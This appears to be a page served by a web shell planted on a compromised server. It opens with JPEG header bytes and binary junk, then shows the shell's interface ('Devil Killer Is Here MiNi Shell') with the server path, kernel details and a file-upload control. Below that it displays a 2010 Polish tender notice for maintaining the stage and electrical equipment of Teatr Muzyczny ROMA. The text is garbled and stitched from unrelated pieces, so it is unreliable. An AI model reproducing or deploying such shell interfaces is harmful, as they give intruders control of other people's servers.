JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100617/157273-N-2010.html

<p class="kh_header"><b>Warszawa: KOMPLEKSOWA KONSERWACJA INSTALACJI ELEKTRYCZNEJ I URZĄDZEŃ SCENICZNYCH ORAZ OBSŁUGA URZĄDZEŃ OŚWIETLENIOWYCH I SCENICZNYCH PODCZAS PRÓB I SPEKTAKLI W TEATRZE MUZYCZNYM ROMA</b><br>
<b>Numer ogłoszenia: 157273 - 2010; data zamieszczenia: 17.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Teatr Muzyczny ROMA w Warszawie , ul. Nowogrodzka 49, 00-695 Warszawa, woj. mazowieckie, tel. 022 6287071, faks 022 6217233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://teatrroma.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KOMPLEKSOWA KONSERWACJA INSTALACJI ELEKTRYCZNEJ I URZĄDZEŃ SCENICZNYCH ORAZ OBSŁUGA URZĄDZEŃ OŚWIETLENIOWYCH I SCENICZNYCH PODCZAS PRÓB I SPEKTAKLI W TEATRZE MUZYCZNYM ROMA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest konserwacja instalacji elektrycznej i urządzeń scenicznych oraz obsługa spektakli i prób w Obiekcie Zamawiającego. 
Wykonawca będzie zobowiązany do zapewnienia obsługi urządzeń elektrycznych wykorzystywanych w spektaklach, w tym urządzeń występujących w elementach dekoracji (scenografii) oraz urządzeń oświetleniowych używanych podczas prób i spektakli. Wykonawca będzie zobowiązany do zapewnienia obsługi we wskazanych przedstawieniach lub próbach. Podczas spektakli i prób pracownicy Wykonawcy będą obsługiwać urządzenia i aparaty sceniczne zgodnie ze scenariuszem przedstawienia. 
Wykonawca zapewni kompleksową obsługę prób i spektakli według harmonogramu ustalonego przez Zamawiającego. Zamawiający przewiduję, iż do obsługi spektakli będą potrzebne cztery osoby. Zamawiający przedstawi z wyprzedzeniem tygodniowym grafik określający ilości osób oraz czas pracy na konkretny spektakl lub próbę. 
Zamawiający wymaga, aby:
- wszystkie osoby przedstawione do pracy przez Wykonawcę posiadały uprawnienia SEP E do 1 kV, a w tym co najmniej dwie osoby uprawnienia SEP E do 15 kV,
- co najmniej jedna osoba posiadała przeszkolenie z obsługi dźwigu szczelinowego,
- co najmniej jedna osoba uprawnienia UDT do konserwacji dźwigów towarowych,
- co najmniej jedna osoba posiadała wiedzę niezbędną do obsługi stołu oświetleniowego i obwodów regulowanych. 
Osoby wyznaczone do pracy przez Wykonawcę powinny posiadać znajomość urządzeń teatralnych, fachowego obchodzenia się tymi urządzeniami zgodnie z wytycznymi przepisów prawa, a w szczególności dotyczących BHP i ppoż. 
Zamawiający przewiduje, iż w ramach obsługi spektaklu każda z osób wyznaczonych przez Wykonawcę będzie świadczyć usługi związane z obsługą spektaklu przez 5 godzin.
Ilość osób niezbędnych do obsługi spektaklu i prób jak i zakres godzinowy ich pracy może ulegać zmianie w trakcie wykonywania przedmiotowego zamówienia.
Osoby wyznaczone do obsługi powinny dysponować aktualnymi badaniami lekarskimi potwierdzającymi zdolność do pracy, w tym zdolność do pracy na wysokościach. Osoby te powinny mieć świadectwo szkoleń bhp - zgodnie z obowiązującymi przepisami.

Wykonawca będzie zobowiązany do świadczenia usług na rzecz Zamawiającego polegających na dokonywaniu nadzoru, przeglądów konserwacyjnych oraz serwisu w nagłych przypadkach urządzeń scenicznych oraz elektrycznych w siedzibie Zamawiającego, ul. Nowogrodzkiej 49, 00-695 Warszawa. 

Wykonawca będzie zobowiązany w szczególności do wykonywania bieżącej konserwacji:

a) sztankietów o nośności Q 250 w ilości 32 sztuk oraz trzech sztankietów o nośności Q 700, polegającej na okresowej regulacji i korekcji lin nośnych oraz codziennym sprawdzaniu stanu m.in.:
 - lin nośnych,
 - kół linowych zawieszenia głównego i przeciwwagi,
 - kół zdawczych a szczególności trzpieni mocujących koła,
 - liny napędowej,
 - prowadników ślizgowych przeciwwagi, 
 - smaru w łożyskach i ewentualne uzupełnienie,
 - zderzaków przeciwwagi górnych i dolnych i ewentualna wymiana,

b) mostów - sztuk 4, polegającej na sprawdzeniu stanu oraz regulacji minimum raz na 14 dni:
 - napięć elektrycznych obwodów mostu,
 - skuteczności zacisków na aparatach i listwach zaciskowych,
 - luzownika,
 - szczęk hamulca i regulacja,
 - sprzęgła i tarczy hamulcowej,
 - lin nośnych,
 - kół linowych,
 - zespołu napędu wciągarki,
 - oleju we wciągarce,
 - smarowania łożysk wraz z uzupełnieniem smaru w smarowniczkach,
 - prowadników ślizgowych przeciwwagi,
 - wyłączników końcowych i krańcowych,
 - prawidłowego ustawienia zespołu napędowego,
 - działania pulpitu sterowniczego.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

c) kurtyny tekstylnej polegającej na sprawdzeniu i regulacji:
 - działania pulpitu sterowniczego,
 - napięć elektrycznych obwodów kurtyny tekstylnej,
 - skuteczności zacisków na aparatach i listwach zaciskowych,
 - luzownika,
 - szczęk hamulca i regulacja,
 - sprzęgła i tarczy hamulcowej,
 - oleju w luzowniku, oraz ewentualne uzupełnienie lub wymiana,
 - lin nośnych,
 - kół linowych,
 - zespołu napędu wciągarki,
 - oleju we wciągarce,
 - prowadników ślizgowych kurtyny oraz przeciwwagi,
 - smarowania łożysk oraz ewentualnym uzupełnienie smaru w smarowniczkach,
 - wyłączników końcowych i krańcowych,
 - prawidłowego ustawienia zespołu napędowego,
 - prowadnic przeciwwagi i kurtyny oraz ewentualnym smarowaniu,
 
Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

d) kurtyny tekstylnej ppoż. polegającej na sprawdzeniu i regulacji:
- wizualnego stanu kurtyny,
- wyłączników krańcowych,
- czujek dymowych sterujących pracą kurtyny - 2 sztuki - minimum raz na 30 dni,
- kasety sterującej pracą kurtyny,
- połączeń elektrycznych w centralce sterującej pracą kurtyny,
- akumulatorów.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

e) kurtyny stalowej ppoż. polegającej na sprawdzeniu i regulacji:
 - działania pulpitu sterowniczego,
 - napięć elektrycznych obwodów kurtyny,
 - skuteczności zacisków na aparatach i listwach zaciskowych,
 - luzownika,
 - lin nośnych,
 - lin napędowych,
 - kół linowych,
 - zespołu napędu wciągarek,
 - stanu prowadników ślizgowych kurtyny oraz przeciwwagi,
 - smarowania łożysk oraz ewentualnym uzupełnienie smaru w smarowniczkach,
 - wyłączników końcowych i krańcowych,
 - prawidłowego ustawienia zespołu napędowego,
 - prowadnic przeciwwagi i kurtyny oraz ewentualnym smarowaniu,
 - poszycia kurtyny,
 - odbojów hydraulicznych przeciwwagi,

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

f) trzech wyciągarek elektrycznych do podnoszenia dekoracji (scenografii ) polegającej na 
 sprawdzeniu:
 - kaset sterowniczych i przycisków bezpieczeństwa STOP,
 - połączeń elektrycznych aparatów i listew połączeniowych,
 - lin nośnych, 
 - hamulca elektromagnetycznego wraz z regulacją,
 - zużycia tarczy hamulcowej wraz z ewentualną wymianą.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

g) trzech wyciągarek elektrycznych nad widownią polegającej na sprawdzeniu i regulacji:
 - kaset sterowniczych,
 - napięć elektrycznych obwodów wciągarek,
 - skuteczności zacisków na aparatach i listwach zaciskowych,
 - luzownika,
 - sprzęgła i tarczy hamulcowej,
 - lin nośnych,
 - kół linowych,
 - zespołu napędu wciągarek,
 - smarowania łożysk oraz ewentualnym uzupełnieniu smaru w smarowniczkach,
 - wyłączników końcowych i krańcowych,
 - prawidłowego ustawienia zespołu napędowego,
 - działania układacza lin.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.

h) ośmiu wciągników łańcuchowych polegającej na sprawdzeniu:
 - sposobu podwieszenia,
 - systemu podnoszenia i opuszczania ciężaru,
 - smarowania mechanizmu podnoszenia i łańcucha oraz nasmarowaniu mechanizmu w 
 razie potrzeb.
 
 i) stacji transformatorowej polegającej na:
 - wykonaniu przeglądów i sprawdzeniu stanu połączeń szyn, części N/N, 
 - co rocznym wykonywaniu pomiarów elektrycznych części N/N, 
 - wykonywaniu przeglądów i pomiarów kontrolnych zgodnie z DTR transformatorów 
 części Ś/N.
 
 j) instalacji wentylacji nawiewno - wyciągowej polegającej na sprawdzeniu:
 - silników elektrycznych,
 - wentylatorów,
 - systemów przekładniowych (pasy klinowe, osłony),
 - nagrzewnic i chłodnic (nie dotyczy mediów zasilających),
 - przewodów wentylacyjnych,
 - komór kurzowych i filtrów,
 - kratek, czerpni i wyrzutni powietrza.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku.
 
 k) dźwigu szczelinowego do przewozu scenografii (dekoracji) polegającej na 
 sprawdzeniu i regulacji: 
 - wartości napięć obwodów dźwigu,
 - skuteczności połączeń na zaciskach aparatów,
 - luzownika,
 - szczęk hamulca i regulacja,
 - lin nośnych,
 - kół linowych i sprzężenia ciernego,
 - sprzęgła i koła zamachowego,
 - zespołu napędu wciągarki,
 - stanu smaru i oleju w łożyskach i ewentualnym uzupełnieniu,
 - stanu prowadników ślizgowych lub tocznych kabiny i przeciwwagi,
 - aparatu chwytnego łącznie z kontaktami bezpieczeństwa,
 - wyłączników końcowych i krańcowych łącznie z ich regulacją,
 - działania kasety rewizyjnej,
 - zatrzymania kabiny na przystankach łącznie z regulacją elementów,
 - kontaktów bezpieczeństwa drzwi szybowych i rygli,
 - zderzaków pod kabiną i przeciwwagą,
 - prawidłowego ustawienia silnika napędowego,
 - wyposażenia kabiny (instrukcje obsługi, kaseta dyspozycji),
 - oświetlenia szybu,
 - kaset wezwań,
 - działania przycisku STOP,
 - czynności dachu kabiny i podszycia łącznie z usunięciem śmieci i innych przedmiotów 
 związanych z eksploatacją dźwigu,
 - smarowania prowadnic, uzupełnieniu poziomu oleju we wciągarce,dźwigu.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku. Wykonawca będzie uczestniczył w obligatoryjnym okresowym badaniu dźwigu przez UDT.

 l) klap dymowych polegającej na sprawdzeniu:
 - kaset sterowniczych i przycisków bezpieczeństwa STOP,
 - połączeń elektrycznych aparatów i listew połączeniowych,
 - liny nośnej, 
 - hamulca elektromagnetycznego oraz jego regulacji,
 - zużycia tarczy hamulcowej i ewentualnej jej wymianie,
 - połączeń mechanizmu otwierania i zamykania klap,
 - przegubów mechanizmu zamykania i otwierania klap oraz wykonaniu smarowania.

Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku. 

m) wyciągarki łańcuchowej polegającej na sprawdzeniu:
 - kaset sterowniczych i przycisków bezpieczeństwa STOP,
 - stanu połączeń elektrycznych aparatów i listew połączeniowych,
 - łańcucha i jego smarowaniu, 
 - hamulców elektromagnetycznych (dwa hamulce), 
 
Wykonawca będzie ponadto zobowiązany do wykonywania pomiarów elektrycznych zgodnie z obowiązującymi normami i udokumentowanie tego stosownymi protokołami pomiarów nie rzadziej niż raz w roku. 

 n) bieżąca konserwacja 9 zapadni scenicznych na scenie głównej polegająca na:
 - smarowanie elementów ruchomych,
 - regulacja rolek dociskowych,
 - kontrola pracy napędów,
 - kontrola stanu konstrukcji nośnej,
 - kontrola i regulacja urządzeń bezpieczeństwa,
 - kontrola systemu sterowania systemu zapadni,

 o ) bieżąca konserwacja dwóch sztankietów o napędzie elektrycznym polegająca na:
 - sprawdzenie działania pulpity sterowniczego,
 - sprawdzenie napięć elektrycznych obwodów kurtyny tekstylnej
 - sprawdzeniu skuteczności zacisków na aparatach i listwach zaciskowych,
 - sprawdzenie i regulacja luzownika,
 - sprawdzenie stanu szczęk hamulca i regulacja,
 - sprawdzenie stanu sprzęgła i tarczy hamulcowej,
 - sprawdzenie stanu oleju w luzowniku, oraz ewentualne uzupełnienie lub wymiana,
 - sprawdzenie stanu lin nośnych,
 - sprawdzenie stanu kół linowych,
 - sprawdzenie zespołu napędu wciągarki,
 - sprawdzenie stanu oleju we wciągarce, oraz ewentualne sprawdzenie,
 - sprawdzenie stanu prowadników ślizgowych kurtyny, oraz przeciwwagi,
 - sprawdzenie smarowania łożysk, oraz ewentualne uzupełnienie smaru w   smarowniczkach,
 - sprawdzenie wyłączników końcowych i krańcowych,
 - sprawdzenie i regulacja prawidłowego ustawienia zespołu napędowego,
 - sprawdzenie i smarowanie prowadnic przeciwwagi i kurtyny,
 - wykonywanie niezbędnych aktualnych pomiarów elektrycznych zgodnie z 
 obowiązującymi normami i udokumentowanie tego stosownymi protokołami 
 pomiarów, 

p) codziennej udokumentowanej kontroli zawiesi.

r) urządzenia służące do podwieszania elementów.

Kontrola powinna polegać na bieżącym sprawdzaniu urządzeń służących do podwieszania elementów dekoracyjnych, scenograficznych i aparatury na scenie, widowni, zasceniu z
godnie z Rozporządzeniem Ministra Kultury i Sztuki z dnia 2 września 1982 r. w sprawie bezpieczeństwa i higieny pracy w instytucjach artystycznych.


Przedmiot zamówienia obejmuje również wykonywanie konserwacji i nadzoru instalacji elektrycznej w budynku Teatru, polegającej w szczególności na:
- wykonywaniu przeglądów zgodnie przepisami, instalacji elektrycznej stałej,
- bieżącym usuwaniu usterek wynikłych podczas eksploatacji instalacji,
- wykonywaniu bieżących remontów instalacji elektrycznej stałej w zakresie wymiany okablowania i osprzętu (projekt i materiały zapewni Zamawiający),
- corocznym badaniu instalacji elektrycznej w zakresie pętli zwarcia i rezystancji izolacji instalacji stałej,
- codziennym przeglądzie wizualnym wszystkich rozdzielni na terenie Teatru,
- codziennym przeglądzie wizualnym urządzeń scenicznych,
- współpracy z firmami zewnętrznymi wykonującymi prace elektryczne na terenie Teatru,
- zapewnieniu dyżuru elektrycznego w dni robocze (w godzinach 8:00 - 22:00) oraz podczas prób i spektakli odbywających się w soboty, niedziele oraz dni świąteczne,
- sprawdzeniu co 6 miesięcy instalacji oświetlenia awaryjnego zakończone spisaniem protokołu,
- wykonaniu pomiarów elektrycznych co pół roku dla wszystkich punktów elektrycznych oraz po każdym remoncie sieci elektrycznych oraz urządzeń ruchomych, a w szczególności wiertarek, spawarek, toaletek w garderobach, odkurzaczy i innych urządzeń elektrycznych, komputerowe oraz AGD,
- prowadzeniu stosownej dokumentacji elektrycznej.


Dodatkowe informacje:

Zamawiający rekomenduje zatrudnienie przez Wykonawcę dotychczas zatrudnianych pracowników, którzy w wyniku redukcji etatów bądź zakończenia okresów umownych przestali być pracownikami Zamawiającego.

Kalkulacja odnośnie ilości roboczogodzin przewidzianych (planowanych) podczas wykonywania umowy:
1) Kompleksowa konserwacja instalacji elektrycznej i urządzeń: 
 - 21 dni (powszednie) w miesiącu po 14 godzin (2 osoby po 7 godzin) = 294 godziny x 
 12 miesięcy = 3528 godziny,
 - 8 dni (soboty, niedziele i święta) w miesiącu po 5 godzin (1 osoba) = 40 godzin x 12 
 miesięcy = 480 godziny,
2) Obsługa urządzeń oświetleniowych i scenicznych podczas spektakli:
 - 250 spektakli w roku (4 osoby po 5 godzin) = 5000 godzin,
3) Obsługa urządzeń oświetleniowych i scenicznych podczas prób:
 - 50 prób w roku (4 osoby po 6 godzin) = 1200 godzin.

Łączne, przewidywane (planowane) zapotrzebowanie w okresie trwania umowy szacowane jest na 10 208 godzin..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.71.10.00-2, 50.00.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:

a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
b) posiadania wiedzy i doświadczenia;
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do
wykonania zamówienia;
d) sytuacji ekonomicznej i finansowej.

2. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.

Ocena spełnienia wyżej określonych warunków odbędzie się wg formuły: spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

Dokumenty powinny zostać dostarczone w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem. Wykonawcy składają oświadczenia wyłącznie w formie oryginału.

3. Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz:

a) wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizował lub realizuje trzy kontrakty na kwotę nie mniejszą niż 120 000 zł brutto, obejmujące kompleksową konserwację instalacji elektrycznej i urządzeń w placówkach użyteczności publicznej, a w szczególności teatrach, operach itp.

c) wykażą, iż dysponują opłaconą polisą, a w przypadku jej braku innym dokumentem potwierdzającym fakt ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 500 000 zł.

4. Wykonawca jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w sekcji III.3.1 Ogłoszenia oraz brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 PZP - lista dokumentów potwierdzających brak podstaw do wykluczenia z postępowania zawarta została w sekcji III.4.2 Ogłoszenia.

5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz:

a) wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizował lub realizuje trzy kontrakty na kwotę nie mniejszą niż 120 000 zł brutto, obejmujące kompleksową konserwację instalacji elektrycznej i urządzeń w placówkach użyteczności publicznej, a w szczególności teatrach, operach itp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz:

a) wykażą, iż dysponują opłaconą polisą, a w przypadku jej braku innym dokumentem potwierdzającym fakt ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 500 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

